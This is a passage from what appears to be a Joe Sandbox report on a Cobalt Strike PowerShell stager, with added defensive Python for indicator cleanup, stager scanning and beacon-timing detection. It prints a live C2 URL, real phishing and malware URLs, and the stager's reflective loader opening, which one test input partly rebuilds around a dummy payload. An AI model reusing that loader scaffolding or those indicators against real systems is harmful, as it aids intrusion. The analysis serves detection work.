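The memory-dump strings above are one C2 URL with trailing garbage from adjacent heap bytes ("dot.gifll", "dot.gifystem32", "dot.gif11:8080/dot.gif"). Before blocking, an analyst reduces them to the one indicator the beacon really uses. Note also that Avira URL Cloud rates every variant "safe" while Suricata fires on the same traffic, so URL reputation is a lagging signal and the extracted configuration and IDS hits are the authoritative ones. The script below is an added example, not Joe Sandbox code: it groups the page's strings by origin and takes the longest common prefix, accepting it only when one variant is that exact string (the case here), and otherwise backing off to the last path separator. The list of strings is copied from the tables; the `example.invalid` pair used to show the back-off is constructed.

```python
from os.path import commonprefix
from urllib.parse import urlsplit

# Strings copied from the report's "URLs from memory" and URL-reputation
# tables; the list itself is assembled here for the example.
MEMORY_STRINGS = [
    "http://3.78.244.11:8080/dot.gif11:8080/dot.gif",
    "http://3.78.244.11:8080/dot.gif~",
    "http://3.78.244.11:8080/dot.gifll",
    "http://3.78.244.11:8080/dot.gifU",
    "http://3.78.244.11:8080/dot.gifllV",
    "http://3.78.244.11:8080/dot.gifPDL",
    "http://3.78.244.11:8080/dot.gifG",
    "http://3.78.244.11:8080/dot.gifD",
    "http://3.78.244.11:8080/dot.gif",
    "3.78.244.11",
    "http://3.78.244.11:8080/dot.gife",
    "http://3.78.244.11:8080/dot.gif9.0",
    "http://3.78.244.11:8080/dot.gifystem32",
    "http://3.78.244.11:8080/dot.gif2",
    "http://3.78.244.11:8080/dot.gif1",
]


def group_by_origin(strings):
    """Bucket http(s) strings by scheme://host[:port]; anything that is not
    a URL (here the bare IP) is returned in a second list."""
    groups, other = {}, []
    for s in strings:
        parts = urlsplit(s)
        if parts.scheme in ("http", "https") and parts.netloc:
            groups.setdefault(f"{parts.scheme}://{parts.netloc}", []).append(s)
        else:
            other.append(s)
    return groups, other


def canonical_urls(strings):
    """Return {origin: (url, exact)}.

    url is the longest common prefix of all variants for that origin.
    exact is True when at least one variant is that prefix verbatim, which
    is strong evidence the prefix is the real string and the rest is heap
    noise. Otherwise the prefix is cut back to the last '/' so we never emit
    a half-segment as an indicator."""
    result = {}
    groups, _ = group_by_origin(strings)
    for origin, variants in groups.items():
        prefix = commonprefix(variants)
        exact = prefix in variants
        if not exact:
            prefix = prefix[: prefix.rfind("/") + 1]
        result[origin] = (prefix, exact)
    return result


if __name__ == "__main__":
    groups, other = group_by_origin(MEMORY_STRINGS)
    for origin, (url, exact) in canonical_urls(MEMORY_STRINGS).items():
        print(f"{origin}: {len(groups[origin])} variants -> {url}"
              f" ({'exact' if exact else 'prefix only'})")
    print("host-only indicators:", other)
```

Run against the page's strings this yields a single origin, `http://3.78.244.11:8080`, with fourteen variants collapsing to `http://3.78.244.11:8080/dot.gif`, plus the bare IP as a host-level indicator.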
IP | Domain | Country | ASN | ASN Name | Malicious
3.78.244.11 | unknown | United States | 16509 | AMAZON-02 (US) | true
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1562630
                                                Start date and time:2024-11-25 19:57:08 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 6m 19s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:3.ps1
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winPS1@2/5@0/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 7
                                                • Number of non-executed functions: 151
                                                Cookbook Comments:
                                                • Found application associated with file extension: .ps1
                                                • Override analysis time to 240s for powershell
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                • VT rate limit hit for: 3.ps1
Time | Type | Description
13:57:59 | API Interceptor | 52x Sleep call for process: powershell.exe modified
                                                No context
                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
AMAZON-02 (US) | https://myworkspaceb7705.myclickfunnels.com/ville-de-rouyn-noranda | malicious | HTMLPhisher, ReCaptcha Phish | 13.35.58.62
AMAZON-02 (US) | file.exe | malicious | Amadey, Stealc, Vidar | 18.238.49.74
AMAZON-02 (US) | https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3D | malicious | Unknown | 3.160.188.112
AMAZON-02 (US) | W9UAjNR4L6.exe | malicious | Njrat | 18.197.239.5
AMAZON-02 (US) | AccountDocuments - christinal.docx | malicious | Unknown | 13.227.8.48
AMAZON-02 (US) | https://protection.cloze.email/r/EKJc7NAc1aGPd0140vt6MnJzYkpI4pQCyldpUEBtdFT8T8dhNmmHodcXxvKddJW4AhfqaDIQj32BX0HxSGbmPeDqDQs/n/SlBNQ05FV1NMRVRURVI/y52l9ppb.r.ap-northeast-1.awstrack.me/L0/https:%2F%2Fcloudprotectionc5f91e84a2b3d9e748f2a1d9b7e5f0c4a2b3d9e7a5pages.dynamixs.workers.dev%2F/1/010601933048cf65-492c630f-d6b3-471e-a31f-bf186231f1e8-000000/SL9CcqykWh2mQIC7eGiOMwzMSpk=185 | malicious | Unknown | 35.79.77.164
AMAZON-02 (US) | https://eastmancuts.jimdosite.com/ | malicious | Unknown | 54.171.97.194
AMAZON-02 (US) | https://www.google.com/url?q=https://clickme.thryv.com/ls/click?upn%3Du001.3HlspJ5fg-2BP4CQkV7GSVhvWTpgC6w0k7sA8b2Z9JBYU9BEMXtqHWLHW9PPcpforJszQ3_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQiOVUz527Ewi1t813S-2FHejAJLe09fD2VqgM8mtwuQZA9i83VLkCPF4iItCSPXKUpNgWQKWxjEO6jlBp5GYVLghrpKcDuea5GONmLMVlbh4fQe7dtjhTFxxxExxfN1kv5tnx1PPl9DjYIyE468wz1qa1Z-2FWJgZrJbIFEpqhd4o5tGGyUoiPcIot5l2j9dpjy7QKj99ZiCz-2BBLi5dHUIl8gC4RxZBl-2FMaH4IZlQyWpqM-2BtZ9uE3ezFUl2fORMwAp4lQk-3D%23Cjanetrosenbach@imageindustries.com&source=gmail-imap&ust=1733149343000000&usg=AOvVaw1uIAp-JnZbTlkY9Td9ZLJj | malicious | HTMLPhisher | 3.160.188.6
AMAZON-02 (US) | file.exe | malicious | Stealc, Vidar | 3.160.188.18
AMAZON-02 (US) | Annual_Q4_Benefits_&_Bonus_for_Ed.riley#IyNURVhUTlVNUkFORE9NNDUjIw==.docx | malicious | HTMLPhisher | 18.158.211.73
                                                No context
                                                No context
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):9434
                                                Entropy (8bit):4.928515784730612
                                                Encrypted:false
                                                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                MD5:D3594118838EF8580975DDA877E44DEB
                                                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6221
                                                Entropy (8bit):3.7293891251548903
                                                Encrypted:false
                                                SSDEEP:48:t/QToHLPr3C4U28zLjgukvhkvklCywCmdk6nQiWl15SogZoJ6YE6nQiWl15SogZS:NPH33CxHH1kvhkvCCtfQiW4HsQiW4HS
                                                MD5:CB9A2F88C67847A9BB3EE74E9ACAF104
                                                SHA1:B30D79DC6C4C976A5569BAC01E6C34E6DA00F593
                                                SHA-256:2E80405AD6A171DABB4950964D748FD776863B5AAA87D30E211E44E6D6F3E166
                                                SHA-512:7CB9AAB4B795079FCA63DB53527422CEE7E121F468F30D3BFD1CC483125F3658CC076B3B0048FA88AEFFE374DDE8CD374A3D1839CAAE615D6D638124E4229139
                                                Malicious:false
                                                Preview:...................................FL..................F.".. ...-/.v....L.}.k?..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....`...k?...k..k?......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^yY;............................%..A.p.p.D.a.t.a...B.V.1.....yY:...Roaming.@......CW.^yY:...........................#...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^yY=.....Q...........
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6221
                                                Entropy (8bit):3.7293891251548903
                                                Encrypted:false
                                                SSDEEP:48:t/QToHLPr3C4U28zLjgukvhkvklCywCmdk6nQiWl15SogZoJ6YE6nQiWl15SogZS:NPH33CxHH1kvhkvCCtfQiW4HsQiW4HS
                                                MD5:CB9A2F88C67847A9BB3EE74E9ACAF104
                                                SHA1:B30D79DC6C4C976A5569BAC01E6C34E6DA00F593
                                                SHA-256:2E80405AD6A171DABB4950964D748FD776863B5AAA87D30E211E44E6D6F3E166
                                                SHA-512:7CB9AAB4B795079FCA63DB53527422CEE7E121F468F30D3BFD1CC483125F3658CC076B3B0048FA88AEFFE374DDE8CD374A3D1839CAAE615D6D638124E4229139
                                                Malicious:false
                                                Preview:...................................FL..................F.".. ...-/.v....L.}.k?..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....`...k?...k..k?......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^yY;............................%..A.p.p.D.a.t.a...B.V.1.....yY:...Roaming.@......CW.^yY:...........................#...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^yY=.....Q...........
                                                File type:ASCII text, with very long lines (12594), with CRLF line terminators
                                                Entropy (8bit):5.738857250711805
                                                TrID:
                                                  File name:3.ps1
                                                  File size:412'061 bytes
                                                  MD5:69c80576e5413dc4d0d60de98439f649
                                                  SHA1:2fe44c3f073e661eb0cd6dd2c5890b067743ea5d
                                                  SHA256:85856010d3e63101c30a3d061dd55c758350030dd9b14794044a479860abb37f
                                                  SHA512:87db764a6217f3a2c6b999122b440cf8dfd5cdbb08ec13147cc2cf1549c18fc0c0afb52d5003313fe1c0d97fb3f7d4ca51062a8e8a37eab564c65c3abcfd211f
                                                  SSDEEP:6144:tgCjcsHxN7zWkV4mne5klEz1/rxiAsmwAJhcEstTHo84ZbxGdnuFmlgC5fe5QLPO:tgC4sRNvW5Oe+cVroAsEJCE38QKOq7bu
                                                  TLSH:C8947C473F59A9ADD612F122EA2EB0C235E4B52F94A58AC4B7F1D4F518F802134F43A7
                                                  File Content Preview:Set-StrictMode -Version 2....function func_get_proc_address {...Param ($var_module, $var_procedure).....$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equal
                                                  Icon Hash:3270d6baae77db44
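The File Content Preview shows the opening of the well-known PowerShell stager template: `Set-StrictMode -Version 2`, a `func_get_proc_address` helper that resolves exports by reflecting over the GAC for `System.dll` and its `Microsoft.Win32.UnsafeNativeMethods` type, followed (in a 412 KB file with 12,594-character lines) by a large encoded payload. Those traits are static and survive most re-obfuscation of the payload itself, so they make a cheap triage check. The scanner below is an added example, not Joe Sandbox tooling: it scores a script on the indicators visible in the preview plus four assumed companions of the same template (`func_get_delegate_type`, the `UnsafeNativeMethods` type name, a `VirtualAlloc` lookup, `FromBase64String`) that the page does not show, and weighs an embedded base64 run of payload size. Both input scripts are constructed for the example; the suspicious one mirrors the preview's first lines but carries a dummy blob, not the sample's payload.

```python
import base64
import re
from dataclasses import dataclass, field

# Indicator regexes. The first three appear in the report's File Content
# Preview; the remaining four are assumed companions of the same stager
# template and are not shown on the page.
INDICATORS = {
    "strict_mode_header": r"^Set-StrictMode -Version 2\b",
    "func_get_proc_address": r"function\s+func_get_proc_address\b",
    "gac_reflection": r"\[AppDomain\]::CurrentDomain\.GetAssemblies\(\)",
    "func_get_delegate_type": r"function\s+func_get_delegate_type\b",
    "unsafe_native_methods": r"Microsoft\.Win32\.UnsafeNativeMethods",
    "virtualalloc_lookup": r"\bVirtualAlloc\b",
    "base64_decode": r"\[System\.Convert\]::FromBase64String",
}
# A base64 run this long is a payload, not a setting or a string constant.
MIN_BLOB = 1000
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_BLOB)


@dataclass
class ScanResult:
    hits: list = field(default_factory=list)
    blob_chars: int = 0      # length of the longest base64 run found
    longest_line: int = 0    # stagers typically carry the blob on one line

    @property
    def score(self) -> int:
        # one point per indicator, two more for a payload-sized blob
        return len(self.hits) + (2 if self.blob_chars >= MIN_BLOB else 0)

    @property
    def likely_stager(self) -> bool:
        # require both the loader scaffolding and something for it to load
        return self.score >= 5 and self.blob_chars >= MIN_BLOB


def scan_script(text: str) -> ScanResult:
    hits = [name for name, pat in INDICATORS.items()
            if re.search(pat, text, re.MULTILINE)]
    blob = max((m.end() - m.start() for m in BLOB_RE.finditer(text)), default=0)
    longest = max((len(line) for line in text.splitlines()), default=0)
    return ScanResult(hits, blob, longest)


# Constructed sample: opening lines mirror the report's preview; the blob is
# base64 of a dummy byte pattern, not the sample's real payload.
_BLOB = base64.b64encode(bytes(range(256)) * 5).decode()
SUSPICIOUS_PS1 = (
    "Set-StrictMode -Version 2\r\n\r\n"
    "function func_get_proc_address {\r\n"
    "\tParam ($var_module, $var_procedure)\r\n"
    "\t$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | "
    "Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1]"
    ".Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')\r\n"
    "}\r\n\r\n"
    "function func_get_delegate_type {\r\n"
    "\tParam ([Type[]] $var_parameters, [Type] $var_return_type = [Void])\r\n"
    "}\r\n\r\n"
    "$var_code = [System.Convert]::FromBase64String('" + _BLOB + "')\r\n"
    "$var_va = func_get_proc_address kernel32.dll VirtualAlloc\r\n"
)
# Constructed benign control: ordinary administrative PowerShell.
BENIGN_PS1 = (
    "Get-ChildItem -Path C:\\Logs -Filter *.log |\r\n"
    "    Where-Object { $_.Length -gt 1MB } |\r\n"
    "    Select-Object Name, Length\r\n"
)

if __name__ == "__main__":
    for label, script in (("suspicious", SUSPICIOUS_PS1), ("benign", BENIGN_PS1)):
        r = scan_script(script)
        print(f"{label}: score={r.score} stager={r.likely_stager} "
              f"blob={r.blob_chars} longest_line={r.longest_line} hits={r.hits}")
```

The benign control scores zero; the constructed stager scores nine and trips `likely_stager`. Tune `MIN_BLOB` and the score threshold to your own corpus: build scripts from module authors legitimately embed base64 assemblies, so the blob alone should never convict, which is why the verdict also requires the loader scaffolding.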
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T19:57:52.370990+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50013 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:58:04.324931+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49730 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:58:26.502407+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49731 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:58:48.674634+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49738 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:59:10.821761+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49739 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:59:33.097220+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49767 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:59:55.285301+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49816 | 3.78.244.11 | 8080 | TCP
2024-11-25T20:00:17.416993+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49864 | 3.78.244.11 | 8080 | TCP
2024-11-25T20:00:39.636064+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49915 | 3.78.244.11 | 8080 | TCP
2024-11-25T20:01:01.824176+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49963 | 3.78.244.11 | 8080 | TCP
2024-11-25T20:01:23.980870+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50011 | 3.78.244.11 | 8080 | TCP
2024-11-25T20:01:46.137579+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 50012 | 3.78.244.11 | 8080 | TCP
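The Suricata hits above fire every 22 seconds or so from a fresh ephemeral port, which is the check-in rhythm of a sleeping implant rather than user-driven traffic. Signature 2033713 catches this beacon by content, but the same periodicity is visible without a content match, from timestamps alone, and is what you fall back on when the profile changes. The script below is an added example, not part of the Joe Sandbox report: it takes the twelve alert timestamps from the table, computes the inter-arrival gaps, and reports what fraction of them sit within 10% of the median gap. The timestamp list is copied from the page; the thresholds (`min_samples`, `min_regular`, `tolerance`) are assumptions to tune against your own traffic.

```python
from datetime import datetime
from statistics import median

# Alert timestamps copied from the report's Suricata table (SID 2033713,
# 192.168.2.4 -> 3.78.244.11:8080); the list is assembled here for the example.
ALERT_TIMESTAMPS = [
    "2024-11-25T19:57:52.370990+0100",
    "2024-11-25T19:58:04.324931+0100",
    "2024-11-25T19:58:26.502407+0100",
    "2024-11-25T19:58:48.674634+0100",
    "2024-11-25T19:59:10.821761+0100",
    "2024-11-25T19:59:33.097220+0100",
    "2024-11-25T19:59:55.285301+0100",
    "2024-11-25T20:00:17.416993+0100",
    "2024-11-25T20:00:39.636064+0100",
    "2024-11-25T20:01:01.824176+0100",
    "2024-11-25T20:01:23.980870+0100",
    "2024-11-25T20:01:46.137579+0100",
]


def parse_ts(s: str) -> datetime:
    # Suricata fast.log / eve style: ISO date, microseconds, numeric UTC offset
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def inter_arrival(ts_strings):
    """Seconds between consecutive alerts, in time order."""
    ts = sorted(parse_ts(s) for s in ts_strings)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def beacon_profile(ts_strings, tolerance=0.10):
    """Summarise how periodic a series of alerts is.

    regular_fraction is the share of gaps within +/- tolerance of the median
    gap. Human or event-driven traffic scatters widely; an implant with a
    fixed sleep and low jitter clusters tightly around its sleep time."""
    gaps = inter_arrival(ts_strings)
    if not gaps:
        raise ValueError("need at least two timestamps")
    med = median(gaps)
    regular = sum(1 for g in gaps if abs(g - med) <= tolerance * med)
    return {
        "samples": len(ts_strings),
        "median_gap_s": round(med, 3),
        "min_gap_s": round(min(gaps), 3),
        "max_gap_s": round(max(gaps), 3),
        "regular_fraction": regular / len(gaps),
    }


def is_beaconing(ts_strings, min_samples=6, min_regular=0.8, tolerance=0.10):
    """Assumed thresholds: at least six alerts, and at least 80% of the gaps
    within tolerance of the median. Short series are left undecided (False)."""
    if len(ts_strings) < min_samples:
        return False
    return beacon_profile(ts_strings, tolerance)["regular_fraction"] >= min_regular


if __name__ == "__main__":
    print(beacon_profile(ALERT_TIMESTAMPS))
    print("beaconing:", is_beaconing(ALERT_TIMESTAMPS))
```

On the page's twelve alerts the median gap is about 22.17 s and ten of the eleven gaps fall within the 10% band (the first, between the 19:57:52 and 19:58:04 alerts, is roughly half an interval), so the series is flagged. Real beacons with a large jitter setting spread the gaps and need a wider tolerance; the price of widening it is more false positives from polling software such as update checkers, which is why this belongs alongside the content signature rather than in place of it.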
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 19:58:00.195401907 CET | 49730 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:00.315545082 CET | 8080 | 49730 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:00.315635920 CET | 49730 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:00.315752983 CET | 49730 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:00.436393023 CET | 8080 | 49730 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:04.324930906 CET | 49730 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:04.434247971 CET | 49731 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:04.554316044 CET | 8080 | 49731 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:04.554414034 CET | 49731 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:04.554482937 CET | 49731 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:04.675780058 CET | 8080 | 49731 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:26.502276897 CET | 8080 | 49731 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:26.502407074 CET | 49731 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:26.502475023 CET | 49731 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:26.605968952 CET | 49738 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:26.622425079 CET | 8080 | 49731 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:26.726027966 CET | 8080 | 49738 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:26.726234913 CET | 49738 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:26.726310968 CET | 49738 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:26.847184896 CET | 8080 | 49738 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:48.674527884 CET | 8080 | 49738 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:48.674633980 CET | 49738 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:48.674725056 CET | 49738 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:48.778868914 CET | 49739 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:48.795824051 CET | 8080 | 49738 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:48.901276112 CET | 8080 | 49739 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:58:48.901372910 CET | 49739 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:48.901523113 CET | 49739 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:58:49.021559954 CET | 8080 | 49739 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:59:10.821686983 CET | 8080 | 49739 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:59:10.821760893 CET | 49739 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:10.891277075 CET | 49739 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:10.997363091 CET | 49767 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:11.017160892 CET | 8080 | 49739 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:59:11.122184992 CET | 8080 | 49767 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:59:11.122306108 CET | 49767 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:11.122419119 CET | 49767 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:11.242952108 CET | 8080 | 49767 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:59:33.097146988 CET | 8080 | 49767 | 3.78.244.11 | 192.168.2.4
